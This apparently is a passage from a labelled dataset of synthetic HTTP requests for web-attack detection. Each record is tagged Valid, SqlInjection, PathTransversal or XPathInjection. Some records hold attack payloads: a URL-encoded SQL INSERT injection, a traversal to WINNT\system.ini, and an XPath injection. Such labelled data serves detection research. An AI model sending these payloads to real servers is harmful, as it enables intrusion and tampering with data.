Cookie: linenoLiim=7l;Qto=emFeRDXz2VEW;96GDehlayenlnqv=me9ariaulo1;geErnH3esao=iYFcdF;ioMRD4w0KZ=86654;tithoidt=where ]it0nrwl:
Cookie2: $Version="03"
Date: Wed, 23 Jun 04 10:22:00 CET
ETag: W/"yKcgygKPCwRoQ3lbkIJ"
Expect: irbS
From: elee@hieitj.de
If-Modified-Since: Tue, 31 May 05 05:38:45 GMT
If-Unmodified-Since: Wed, 30 Jul 08 07:56:49 UTC
If-Match: "RZ9aaCGbXnEqbBLPfN2"
If-None-Match: *
If-Range: Wed, 28 Mar 07 21:36:14 GMT
Max-Forwards: 22
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.8ios34Ss.be/GyNmnu/hNIaa/tnui75/Ns1n8sf/efisp.php3
Authorization: NTLM c2VzdHdIMWRlZXVpaWloZUl5bmlockdsZnJJb2FjZWdhdQ==
Range: 2764-93323,17883-91
Referer: /o0jlo.html
TE: chunked,trailers
Trailer: If-Range
User-Agent: owpewreVl/0.3.3
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: eg7Jdi/7.9 79.217.251.234:0, FTP/9.4 www.rtsee.htm:898
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41883
Start - Id: 22498
class: Valid
GET /oyQ3hXGg26J@.tiff?dIoti=%28r%5Dge+%2FxCdissrniv1&eswnaima1vtcpe=iee4&p1hxiReoPoenxl=%26adminn%2Ba&nleennNuor1ob=7991092&dvtS5eoI=4289&vet4e6oeg0=awoFuBTLen_2&hoeibnhw5ohcs=jZxTFd&tsv8reshdth=O%3Adnltsot1Iliz&3nph-mP=Lelartu%3Fmbizal&gWdE2ofX3=094&sAet197r=74336 HTTP/1.0
Host: www.iuiprsr7.de
Connection: keep-alive
Accept: text/xml;q=0.5
Accept-Charset: windows-1255, iso-8859-1;q=0.0, iso-8859-5, iso-2022-kr, iso-8859-2
Accept-Encoding: deflate;q=0.7, identity;q=0.2, identity, compress;q=0.9, deflate;q=0.6
Accept-Language: 0-y;q=0.5, bhe7qao-unietr4l, eiu5nUeO-stthdu, tiai85t-haSgr
Cache-Control: no-store
Client-ip: 153.243.246.117
Cookie: Bae7paeeoiF=774520
Cookie2: $Version="82"
Date: Wed, 22 Feb 06 20:45:27 CET
ETag: W/"wRAoqzNk_9Rb0Px8h57"
Expect: uzxrn
From: upRm@nHnn9eu.org
If-Modified-Since: Thu, 06 Jan 05 02:49:42 UTC
If-Unmodified-Since: Sun, 17 May 09 02:45:53 CET
If-Match: ".0Ff_5OoOzgx1xa"
If-None-Match: "Cc3nJ3YeLTdnPCnH"
If-Range: Wed, 03 Aug 05 15:45:30 GMT
Max-Forwards: 7
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: NTLM b3hhZW51aGxuMXUwRmVsdHNtZnJlMHRpbmNYOXNkdHBlQjNiZUN0
Range: 58243-416,53-,-588
Referer: /etcd8o/snfarhs.msf
TE: chunked;q=0.3
Trailer: If-None-Match
User-Agent: ttlmdT- http://www.t5TOttxT.net
UA-CPU: MIPS
UA-Disp: 3911,9683,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1822x173
Via: 7.9 www.3ctzccrr.tiff
Transfer-Encoding: deflate
Upgrade: leaHT/8.3, sdhsou/7.9, acol/9.0, ikfFc/4.1, 61ealm/2.2
Warning: 515 www.vdEcm.shtml:048 "6na16YAmltecfI" 
X-Forwarded-For: 91.195.98.163
X-Serial-Number: 039607543523692189
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22498
Start - Id: 28675
class: Valid
GET /eG8/iw9M/tlydion/pesqFs/eea3/pNMLP.v/aeiseilwzeo/tm-vUBVA4.gif?QGu8q-Ly3mcY=780&ep1qEohile1yd=t0crP3&hayehj=nph-a4dw5e&T6q6nc7EkXY.w=klEil&ehaEicrmquin=9W9tFh0i9&DYEZ=nehhol1hneo&L2eneguna0n=ha+ncqip%26ahl%29EasIa&J7ynFRvMECQl=7&JXaR=bttzrun0TeNeeleh7a HTTP/1.0
Host: 195.47.251.2
Connection: keep-alive
Accept: application/*, audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, deflate;q=0.2, identity;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 163.137.139.118
Cookie: nszMn=ezeSlv
Cookie2: $Version="070"
Date: Wed, 04 Feb 04 20:50:40 GMT
ETag: W/"7nyImRFLWvsOP_5r6P"
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Sat, 17 Jul 04 16:09:23 GMT
If-Unmodified-Since: Mon, 03 Dec 07 05:56:11 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Oct 09 14:00:42 UTC
Max-Forwards: 52
MIME-Version: 5.7
Pragma: eaws5=ic
Proxy-Authorization: Basic OG5vZnVpZXI6bmx6ZWE2eQ==
Authorization: Digest username="seenfq"
Range: -6
Referer: /1lntji/t9ie.mspx
TE: gzip,deflate
Trailer: If-Unmodified-Since
User-Agent: 1tanradbom (lNYlOp; tDFYAh; h6fO.PAIVI; efgbTd; ubrCbQj8)
UA-CPU: StrongARM
UA-Disp: 670,5224,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 621x541
Via: HTTP/3.4 107.78.38.168, 1.2 www.eoeiiZgv.jpg
Transfer-Encoding: deflate
Upgrade: dco/2.9, l3E/4.8, mfm3E/1.3
Warning: 526 89.101.251.167 "ejeEeichnlERlaprClch" 
X-Forwarded-For: 104.129.150.117
X-Serial-Number: 244229732731
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28675
Start - Id: 27580
class: Valid
GET /aarnpeE/xE_F/Sn0GHJxL8/ehaxcrettSflsrSnlh/diOg9ta1ihq5Csnd.msf?u3ltnrreG=%3DS++gr6home&rrevthihgtndO=5phpd%40 HTTP/1.0
Host: www.nphqmt.ch
Connection: r4rjibt
Accept: audio/*, audio/*;q=0.6, video/quicktime;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: eumf-0lo0ss5;q=0.5, tned-m;q=0.7, eahwa3-iePeseuo, penN-nteitnF;q=0.0, hyrro-sOn;q=0.0
Cache-Control: no-transform
Client-ip: 62.241.68.195
Cookie: inrahssaEtuoxl=eax2hqtWsaeu8tbSg;7lq=lv-v;strsth=7
Cookie2: $Version="53"
Date: Wed, 14 May 08 13:29:06 UTC
ETag: W/"RnsaK75biiOYgV9ooI"
Expect: hriihcn
From: vumaCtt@lcmSrhje3.gov
If-Modified-Since: Thu, 25 May 06 18:45:30 GMT
If-Unmodified-Since: Wed, 18 Apr 07 01:50:03 CET
If-Match: "mIk2d6l4MiBSuvdDe4j"
If-None-Match: *
If-Range: *
Max-Forwards: 5380
MIME-Version: 3.2
Pragma: e='s1hj'
Proxy-Authorization: NTLM c2V3ZWEyQWhneDhnZnRWdG80dG9tdG5ycnRldHJtY2VpNw==
Authorization: NTLM NmRzM2l4aUxwMHRtZGFldG9leFQzZWl5bU9hZ2hUdW8=
Range: 64-,748105-9,686441-
Referer: /tfjqttt/MetasAo/ne3brs.png
TE: trailers
Trailer: Date
User-Agent: UkgAoshci8
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9849x0331
Via: FTP/0.8 135.254.63.11
Transfer-Encoding: gnree; algd48i=i8otcee
Upgrade: teoevo/0.3, snoPeb/0.1, 2nelh/5.8
Warning: 331 www.diTinet.gif "tnshfyn" "Fri, 25 Jan 08 20:11:44 UTC"
X-Forwarded-For: 164.135.194.215
X-Serial-Number: 981002451847227
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27580
Start - Id: 42205
class: SqlInjection
GET /K9E.asmx?lnaends9lot9o=54199&hrrao0=tee%5C&dn1amnu=Atotw&syzG_=%3B+EXEC%28+++%27INS%27%2B%27ERT+++++INTO+users+values%2879%2C%277ipeenrah%27%2C%27ark5rdpc%27++++%29%29&8sEwi6mesrm5=24&g5=63&g_vk=37&k88emtohotiTt=dlirn&ehllPw3=hI&et0rOeie=+&s52oferYaeg=254&5tliaR=30&lettgAdaG=eJB3EezyVMBQ&tcqajcdthNblnr=m%5Dtupdater HTTP/1.0
Host: 13.16.239.101
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, windows-1257;q=0.5, x-mac-japanese, iso-10646-ucs-2
Accept-Encoding: identity
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 189.179.253.21
Cookie: aBnt=c7G;reeougA=283;5l@QgB2dKh=2;ZCA0=$rD;s3kijEtlincdsl9=3772190773
Cookie2: $Version="83"
Date: Wed, 07 Jul 04 04:08:51 CET
ETag: W/"fn7bj1SqWuSxNn3lC"
Expect: Nbgi4yw
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 21 Jul 05 02:24:56 GMT
If-Unmodified-Since: Tue, 20 Sep 05 18:30:43 UTC
If-Match: *
If-None-Match: *
If-Range: "_h1KHJSxLwaeJm-ZMRm"
Max-Forwards: 7
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: tohms oro1h=3Duzsaa
Range: 8473-303,-227666,770360-
Referer: http://cnt8sra.st/pyltt.exe
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Accept
User-Agent: Mozilla/4.8 (compatible; MSIE 4.7; Linux i386; anoirtot)
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 451x3766
Via: 4.6 126.11.149.103, qonc/4.8 www.lLv4sa.tiff
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 174.56.222.47
X-Serial-Number: 11545231207
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42205
Start - Id: 6141
class: Valid
PUT /r8Qb@8xJScnj4yuc/dWJ08gF.usMoJ1UY/taauAfesixirQ/kN9/rzXs2UtdSsoracf.css? HTTP/1.0
Content-Length: 205
Content-Language: 6dtklsse,3llwhpaf,t
Content-Encoding: compress
Content-Location: /fn8nwro/clsm/Sylh/sndauo/d0hhrx.rar
Content-MD5: NGxlZU9nMnBkT2FleXJzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Apr 07 04:43:07 GMT
Last-Modified: Wed, 06 Jul 05 14:30:36 UTC
Host: 47.88.177.26:04755
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.4, identity, gzip, identity;q=0.5
Accept-Language: rs-wsrc6e, abf-Xatoil;q=0.1, 7XaebOp-tinlpd
Cache-Control: lea9rdh=solasQhi
Client-ip: 213.36.197.19
Cookie: ia2nr32tdssmy=3;tsensarajoos=wwrr?;toyus5O0huog=5133441;rls1Lrstrh=24819546;zreanN6hgyni=pokurWfokcna80Euf;Zet36=yteialotAvn
Cookie2: $Version="52"
Date: Thu, 30 Oct 08 09:55:01 CET
ETag: "-1JU0w8x7nVeD3F"
Expect: meaF=Ewr0e;un9o=eexf1
From: arnac8@nERnnE.be
If-Modified-Since: Wed, 24 Mar 10 19:48:14 CET
If-Unmodified-Since: Thu, 27 Nov 08 21:31:48 GMT
If-Match: "T8f.ngLVsvzYE8u"
If-None-Match: *
If-Range: Fri, 23 Nov 07 22:54:22 CET
Max-Forwards: 659
MIME-Version: 4.3
Pragma: asDAt2la='8ns'
Proxy-Authorization: Digest algorithm=cedo
Authorization: NTLM bmVjZWZsb290bGFpaGN2OWt1ZXJ1cG5kVHRyYWJmYXM5c3V1dG55aA==
Range: 611533-,1458-075
Referer: /lsrs/hhsebsH/hzdEn/lsi9axaf/teedzopA.cfm
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: tadn0Dpt7teec
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 853x3655
Via: ssrBki/8.3 www.ehwotOrf.css:0, n7u/4.8 75.173.204.193, FTP/9.9 www.Eleoifut.css:7
Transfer-Encoding: deflate
Upgrade: pnds/8.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 102.22.144.240
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

eld3n3anDhorut=976&bIrmttpn=e3gneroaitAexecg&23=bEWBUxQF&l0U@E=e.rsZ&4n4lrmNahddte=e+c+ie&D%uSb=trq%3Bkraram&oaa80seovnHz=5i%2FlincludesreB&Z15Ov=gHrEttywo&fgax=eefxp_ec5ii%29%7Eci&aiunwo=dVO-AKWN&tokeI=86

End - Id: 6141
Start - Id: 24895
class: Valid
GET /eolFEteret1rN/dE/hkmimqa/BE78W6f4dc7OH/tqJPG/nt9LTj8qclXDU.bin?dsEc=edvm&lnmsnaezthDs5h2=755275&litasa913Hboprn=itratiwleEr&enuhebmaa=tuinm6qeedetohrn&3m2erl65=7q.GXOccFWJ&tldergCvjzl=092510&p.XMs2=adloH2Eifq&hb=ue%2F%2BErbin%3Elgroup+byna&gv2k=2&swtt=6533&3xtermR.Bt62K8=Soce&Eeqnns5npletwps=Ie+Vd HTTP/1.0
Host: 36.23.23.151:438
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, identity, gzip, compress;q=0.9
Accept-Language: *
Cache-Control: ilbo='r9dRepth'
Client-ip: 156.60.110.77
Cookie: oihoylextennaSe=3561341858;Irhnetcatf=nph-miiatOav;tr2oeertl=51URlAyT;okxaoenewtt=yWGL;ndta=qSp.6f8C21;fm9iah=212976946
Cookie2: $Version="874"
Date: Thu, 15 Mar 07 18:59:27 CET
ETag: W/"FxtqU09exwYLETXGjByR"
Expect: 100-continue
From: jetanin0@wfha2rk3x8.biz
If-Modified-Since: Fri, 08 Dec 06 08:12:48 GMT
If-Unmodified-Since: Sat, 11 Nov 06 07:16:48 GMT
If-Match: *
If-None-Match: "54QuxZNLBTnx2ETkAP.Y"
If-Range: "Wbj-08emkthSdsO_kC"
Max-Forwards: 42
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest nc=1DFD5C02
Authorization: Digest cnonce="nomg"
Range: 16122-,024603-0,-592
Referer: http://www.rwWty.cz/wE8qt/fnwa.php4
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/2.3 (X11; U; Solaris 8.0; ta-iu; rv:6.9.3) Gecko/92568053
UA-CPU: MIPS
UA-Disp: 8792,070,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1125x5774
Via: 4.5 www.gpthllb.jpeg:6685
Transfer-Encoding: deflate
Upgrade: 7ba/7.9, eEidk/9.1, nEhd/9.1
Warning: 430 178.33.189.66 "taE90anszeAies" "Thu, 03 Feb 05 22:56:19 CET"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24895
Start - Id: 34572
class: Valid
PUT /st/iGAv541lsc/e90BsvVDbtLTzfiDFX/dshHkazAb/lOgGnkC/yeB8BrR_D/Deh/rBeo6DeGv@xyTuu/l8Lskn7yYk/r5IRycmybubich/uIAK0j6Yy_Ij6Y9/im4CfPySS@Rzdo.x.shtml? HTTP/1.0
Content-Length: 162
Content-Language: e,sst
Content-Encoding: deflate
Content-Location: http://eefole.com/aztLoGP/hi4bm/laiwAr/ceey/eNsd.htm
Content-MD5: aGFwZGliaW1vRWUxd2V0WQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 Jun 09 16:45:07 GMT
Last-Modified: Wed, 12 Jan 05 18:01:09 CET
Host: 149.25.247.210:44183
Connection: keep-alive
Accept: image/*;q=0.1, image/*;q=0.3, text/html;q=0.7
Accept-Charset: iso-8859-8-i;q=0.5, koi8-r;q=0.8, windows-1251;q=0.8
Accept-Encoding: 
Accept-Language: wtnne-3ydeusb;q=0.9, Td-ruyl;q=0.0, lsl5tua-tejkaiAa, tdd-eqheonaa;q=0.7
Cache-Control: 9nr=oorn
Client-ip: 127.160.158.140
Cookie: tr6ftm=roat8quaa
Cookie2: $Version="5"
Date: Tue, 16 Jan 07 01:09:50 UTC
ETag: W/"LPS.Z@kNK.gtaqS"
Expect: 100-continue
From: r4o9@ecoOy.ch
If-Modified-Since: Thu, 24 Jul 08 01:16:53 GMT
If-Unmodified-Since: Tue, 17 Jan 06 09:45:53 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Nov 04 10:15:17 GMT
Max-Forwards: 511
MIME-Version: 7.7
Pragma: lia4Met=rtteoarU
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: wtetz egvtds6p=ay4sHr6m
Range: 1867-,-2727
Referer: /se2ett/ednidt/ded9.zip
TE: deflate,trailers,trailers
Trailer: Connection
User-Agent: rgoeljbN (0EESwWOVUm; 20Ir2q96; maWOJm; 1xH3aIcdfY)
UA-CPU: x86
UA-Disp: 259,255,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 512x9817
Via: FTP/5.1 www.ldEk.css
Transfer-Encoding: identity
Upgrade: Qodwe/1.4, 5thx7/5.2, EeTnts/6.6
Warning: 255 www.p5msr.tiff:10 "hpA8iaYfstbseet" 
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 8498191575866
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a5sohy4ss=146321&k7ICsi1Htiw1=575&qcl=Tedb7drmG&tuj0hntv=80d&oHrRucb7nns=eodtirmHet=qeaoescripts n&FWLW=rht&ienhmtirye=p-YzTv&lrxdt=5198&lfn9aoaf2jtai1n=@ytwe

End - Id: 34572
Start - Id: 17155
class: Valid
GET /av8YJTEwlib7UE/uivsjTHEv0cYjntrue3i/de9ltq7sjsnuesMr.htm?I1nullFg=cI HTTP/1.0
Host: www.aetns.cz
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 85.121.152.194
Cookie: sdrleWa1nEsoy=4;xoE.Zpq=722
Cookie2: $Version="71"
Date: Tue, 03 May 05 12:00:11 GMT
ETag: "jAyeVpIhmD81RQ4"
Expect: co46Lyu5
From: gcEsmc@smae.st
If-Modified-Since: Fri, 09 Jan 09 22:19:36 UTC
If-Unmodified-Since: Thu, 21 Apr 05 06:58:00 GMT
If-Match: "@lxq3@PuJVsFNiV5jp"
If-None-Match: "FBUwaohQJ1Ier._Ce"
If-Range: Wed, 28 Jul 04 02:32:00 GMT
Max-Forwards: 53
MIME-Version: 3.2
Pragma: d=irNtsea
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: Basic YWhoYnI6bnRpbnQ=
Range: 6398-,1074-5081,99-87016
Referer: /utrE6.js
TE: gzip;q=0.9
Trailer: Accept
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 4.9; em-S9; rv:2.4.9) Gecko/44732562
UA-CPU: StrongARM
UA-Disp: 817,8711,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: epr/4.2 www.o7srensh.png, hdd/8.1 www.raef.js, ma0s/0.1 www.ercyoo.htm
Transfer-Encoding: compress
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 884 66.52.11.38 "buetRO9tneeajg1yc" 
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 92445
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17155
Start - Id: 36163
class: PathTransversal
GET /hr6ttodnweMT9n/dgDguv5CJV0Tn9bYm/6gOiFN/evVz0RQeX/esIP7eN_EaE2u3UM8eNK/pFEO.dcm39N/ree9snoslS/ykleteauaotn/clowixdp4/rKqLA8/tpiiihca.jpg?krsrsc=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&Wtkt51oreae4trh=sVd9Ta&gyji7aen6EOn4c=121&aeedttdhd=ms HTTP/1.0
Host: 138.236.58.88
Connection: close
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: al0elno-n7, qoblyol-ewanyIhS;q=0.4, ifvlhne-i, e73beicn-t, tt-ar;q=0.4
Cache-Control: min-fresh=5
Cookie: wTetd=execs06s
Date: Thu, 04 Dec 08 02:32:14 GMT
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: 100-continue
From: esie@ntoatbni.fr
If-Modified-Since: Tue, 27 Apr 10 22:33:27 UTC
If-Unmodified-Since: Wed, 12 Jul 06 01:36:17 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 08:37:32 UTC
Max-Forwards: 5
Pragma: teteoR7b='ieeRBnn'
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 883-12,6163-,33622-
Referer: http://www.whjhq.gov/m6Znh.bin
TE: gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/2.1 (compatible; MSIE 1.2; Mac OS X; 6n5s; heqIae)
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: I6tq; evoJodre=iodNi0
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 42.90.242.122
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36163
Start - Id: 31571
class: Valid
GET /Yahttt/eejSkUWIyuUdYa/YiI9Qz.IBxC/ns7H/lWSWLE/mlve981c3rbzcncT/s4Rjai2/turetdjycpayeAnpdoe/roEWeeruyqb0h7tishab.png?dHhue=7scripttun&hdeRAmpsw=%5D%27lcopyo3dnhRasn&MGoz-=aaTwFB&zhe=3442&@WlkX=714844&TJOg.2BbF=bo%7C&ezsgrabwril5=56490774&osrrsus3yeth=otett HTTP/1.0
Host: www.hiaicYt3oa.it:80
Connection: keep-alive
Accept: image/*, image/png;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: fsn64rRo-idard2t;q=0.3, lpeuL-ufTih;q=0.3
Cache-Control: only-if-cached
Client-ip: 19.207.118.61
Cookie: N3MfEoYPm=961;2iIerch5fesitip=81510
Cookie2: $Version="95"
Date: Sat, 28 Feb 09 08:47:31 CET
ETag: W/"6RST.bD-FTLuqR.0zM"
Expect: 7obvlt
From: iaar@tt4tqltp.org
If-Modified-Since: Sat, 12 Mar 05 09:41:43 CET
If-Unmodified-Since: Sat, 22 Mar 08 07:26:26 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 295
MIME-Version: 7.2
Pragma: 0eaqr=esn
Proxy-Authorization: Digest qop=auth
Authorization: NTLM NEZuT3RSZ0lSOGRsdGFhaTNFc2xpNnJoZGRvaHRycnNicnFITU82bE8=
Range: -40023,010285-,775998-
Referer: /gnate1l/ttJu/tidiitee.php
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: 6tme/1.4.0
UA-CPU: Sparc
UA-Disp: 7964,455,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 951x498
Via: 2.8 www.axswirq.htm
Transfer-Encoding: compress
Upgrade: mnu6a9/9.2, fhxH/0.0, aus/8.5, Eahlfs/8.9, aeEioe/8.1
Warning: 706 219.37.111.64 "5rhSqrlrse8tacoit" 
X-Forwarded-For: 190.159.59.68
X-Serial-Number: 7616561595248452
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31571
Start - Id: 35639
class: XPathInjection
GET /ettre/MstdinLlclink/msw.nsf?erCorya=d6ZwS&buhlsonoi=tfese&olsa=ive&lkDaSE5rrc=62847099&lrcm=omc-1XUy&daogtR=5151+or+mi%2FMlk8o%2Fhys%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D++++or+7790%3D&7ts=5254778&wssslTw=dedssilhahIab&etcfVVJA3LB3Inode=g6it+e%3Bnph-r6yyf8dh&mao3=e&be41iAebw=370149 HTTP/1.1
Host: 23.255.170.55
Connection: close
Accept: text/*, text/*
Accept-Charset: iso-8859-8-i, windows-874;q=0.1, iso-8859-3, cp-950, x-mac-hebrew
Accept-Encoding: identity;q=0.1, gzip, identity;q=0.1
Accept-Language: a-fsaeh
Cache-Control: bmrdbrp=miike
Client-ip: 69.177.219.175
Cookie: ybetweenf_Nsps=anpdtiLsaee;5rcnrsslioa=3185;a3eeavetlee=stnki
Cookie2: $Version="5"
Date: Wed, 25 Nov 09 02:53:34 GMT
ETag: W/"5joi@sl1CHdkS19bN3"
Expect: 100-continue
From: nenfl@ioddyed.it
If-Modified-Since: Sun, 11 Dec 05 07:30:52 GMT
If-Unmodified-Since: Wed, 24 Dec 08 02:45:14 CET
If-Match: "@mJE_Mt4cyjZjSq"
If-None-Match: "eqCypgzeag9x73Ip"
If-Range: Sat, 09 Aug 08 02:10:46 UTC
Max-Forwards: 1
MIME-Version: 1.3
Pragma: h='onEeEth'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM RG9kY0lPanM3aGlpd1M2dGFvZ2kxaDRrbm0wdGVyY3Noc3Bobm56YmQ=
Range: -38,162-85,-031
Referer: /dnaes/eunBeo/o8as6e/torDeai8/auiwtit.jpeg
TE: gzip,gzip,gzip;q=0.3
Trailer: Range
User-Agent: emVe4b75 http://www.enhW0scr.be
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3327x2128
Via: tete3/5.1 81.40.254.3, 3.0 217.130.122.170:6687
Transfer-Encoding: compress
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35639
Start - Id: 21841
class: Valid
GET /vR64/nb2heNiJxea9/nwCGRhto1/8Ij1woc2SdqzDTKwp@/inrylstc/onfoilenahapiehssR/vvO0ewnehrimoze/75Dg/e_v2MRqZf-6h-_xd/hgEdjive/taekvm6ectnnw.cfm?eopdtelecmy0rI=664674377&KSt_reP-.=52&rciuhea=44&mt=nbd-W8ejwXA&gn2r14f=eie%24f&fuecDIlcxb=o.p&p8nsn4knsbs7kl=nWD-YW&nijonvetoIveyia=kphLyowzso HTTP/1.1
Host: 83.69.177.105:05875
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.7, gzip;q=0.8
Accept-Language: *
Cache-Control: max-age=5791
Client-ip: 7.152.207.156
Cookie: VAlbr3OkC_v=0
Cookie2: $Version="387"
Date: Sat, 19 Apr 08 01:33:05 CET
ETag: "nKqVikWhRsnFSJJpA18C"
Expect: sLi9lbS
From: jetyea@ygnjrnaAdd.st
If-Modified-Since: Sat, 03 May 08 18:44:42 CET
If-Unmodified-Since: Mon, 05 Jul 04 22:14:52 CET
If-Match: "ZwzjQZd0OH4gO74n6"
If-None-Match: *
If-Range: Sun, 17 Apr 05 02:54:14 GMT
Max-Forwards: 0
MIME-Version: 0.6
Pragma: h=es92akto
Proxy-Authorization: Digest response="D5B0a7D66ce9CaDc9B7fbC4bBDdCb0cC"
Authorization: NTLM aW5lb2RjQWRyZGpyaDBjOWpEMFhhY2xlSVN1dGlpcXpTc2l0c3Bo
Range: 24-5050
Referer: /miehV/ji6oQegY/otNn1r.htm
TE: gzip,trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/2.2 (X11; U; Open BSD i586 8.7; nO-oa; rv:2.2.9) Gecko/77998087
UA-CPU: x86
UA-Disp: 488,0035,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3901x4660
Via: 8.1 93.166.34.163, 0.0 www.a7ithn3o.jpg
Transfer-Encoding: meam0
Upgrade: rhorei/6.8, eO4/0.9, dtoA/9.0
Warning: 129 www.4dTmhes2.png "Zrp6za" 
X-Forwarded-For: 113.55.233.173
X-Serial-Number: 202474
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 21841
Start - Id: 35749
class: XPathInjection
